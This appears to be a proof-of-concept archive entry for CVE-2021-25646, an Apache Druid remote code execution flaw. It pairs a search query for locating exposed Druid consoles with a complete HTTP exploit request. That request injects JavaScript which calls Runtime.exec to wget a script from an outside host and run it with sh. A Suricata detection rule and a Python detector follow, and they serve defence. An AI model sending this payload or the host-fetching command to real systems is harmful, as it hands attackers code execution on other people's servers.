Related vulnerability
Title:
Apache Druid improper access control vulnerability
(CVE-2021-25646)
Description: Apache Druid is a column-oriented, open-source distributed database written in Java and maintained by the Apache Software Foundation (US). Apache Druid 0.20.0 and earlier contain an access control flaw that lets an authenticated user force Druid to run user-supplied JavaScript code, executing it with the privileges of the server process.
Introduction
# Apache Druid RCE
# title="druid" && title=="Apache Druid"
```http
POST /druid/indexer/v1/sampler?for=filter HTTP/1.1
Host: x.x.x.x:8888
Content-Length: 612
Accept: application/json, text/plain, */*
Origin: http://x.x.x.x:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/json;charset=UTF-8
Referer: http://x.x.x.x:8888/unified-console.html
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",
"function":"function(value){return java.lang.Runtime.getRuntime().exec('wget http://x.x.x.x/1.txt -O /tmp/1.sh && sh /tmp/1.sh')}",
"dimension":"added",
"":{
"enabled":"true"
}
}}}},"samplerConfig":{"numRows":500,"cacheKey":"73a90acaae2b1ccc0e969709665bc62f"}}
```
# Detection rules

```
alert http any any -> any any (msg:"ET EXPLOIT CVE-2021-25646 Apache Druid RCE POST"; flow:established,to_server; content:"POST"; http_method;content:"/druid/indexer/v1/sampler?for=filter"; http_uri; content:"java.lang.Runtime.getRuntime().exec(";http_client_body; nocase; reference:url,mp.weixin.qq.com/s/Eny6AnFarvvpjeEJNMfTrw; reference:cve,2021-25646; classtype:web-application-attack; sid:2031533; rev:2; metadata:affected_product Web_Server_Applications, created_at 2021_02_03, cve CVE_2021_25646, former_category EXPLOIT, signature_severity Major, updated_at 2021_02_03;)
```
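The Suricata rule above keys on three literal content matches. As an added example (not part of the PoC repository), the Python below reproduces those matches over a constructed sampler request and adds a JSON-aware check that flags any `javascript`-typed node in the spec, which also catches requests that avoid the literal `Runtime.exec` string; both sample requests and the `PLACEHOLDER` argument are constructed for the example.

```python
import json
import re

# Constructed sample request modelled on the README request above; the
# exec() argument is a placeholder, only the marker string matters here.
SAMPLE_MALICIOUS = {
    "method": "POST",
    "uri": "/druid/indexer/v1/sampler?for=filter",
    "body": json.dumps({"type": "index", "spec": {"dataSchema": {"transformSpec": {"filter": {
        "type": "javascript",
        "function": "function(value){return java.lang.Runtime.getRuntime().exec('PLACEHOLDER')}",
        "dimension": "added",
        "": {"enabled": "true"},
    }}}}}),
}

# Constructed benign sampler request using an ordinary selector filter.
SAMPLE_BENIGN = {
    "method": "POST",
    "uri": "/druid/indexer/v1/sampler?for=filter",
    "body": json.dumps({"type": "index", "spec": {"dataSchema": {"transformSpec": {
        "filter": {"type": "selector", "dimension": "added", "value": "1"}}}}}),
}

RUNTIME_EXEC = re.compile(r"java\.lang\.Runtime\.getRuntime\(\)\.exec\(", re.IGNORECASE)

def matches_et_rule(req):
    """Mirror the rule's three content matches: POST method, the sampler URI,
    and the Runtime.exec marker in the client body (nocase)."""
    return (req["method"] == "POST"
            and "/druid/indexer/v1/sampler?for=filter" in req["uri"]
            and RUNTIME_EXEC.search(req["body"]) is not None)

def _find_javascript_nodes(node, path=""):
    """Walk parsed JSON and yield the path of every object whose type is javascript."""
    if isinstance(node, dict):
        if node.get("type") == "javascript":
            yield path or "$"
        for key, value in node.items():
            yield from _find_javascript_nodes(value, f"{path}.{key}" if path else key)
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from _find_javascript_nodes(value, f"{path}[{i}]")

def javascript_nodes(req):
    """JSON-aware check: a javascript-typed filter or transform in a sampler spec
    is suspicious on its own, since Druid ships with JavaScript disabled by default."""
    try:
        doc = json.loads(req["body"])
    except ValueError:
        return []
    return list(_find_javascript_nodes(doc))
```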
File snapshot
[4.0K] /data/pocs/19efbb8417eb2f65f2eb77ea8d38c849b6bead93
└── [1.7K] README.md
0 directories, 1 file
Notes
1. Prefer accessing the PoC through its original source.
2. If the source is no longer available or cannot be reached, email f.jinxu#gmail.com (replace # with @) to request the local snapshot.
3. 神龙 (Shenlong) has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.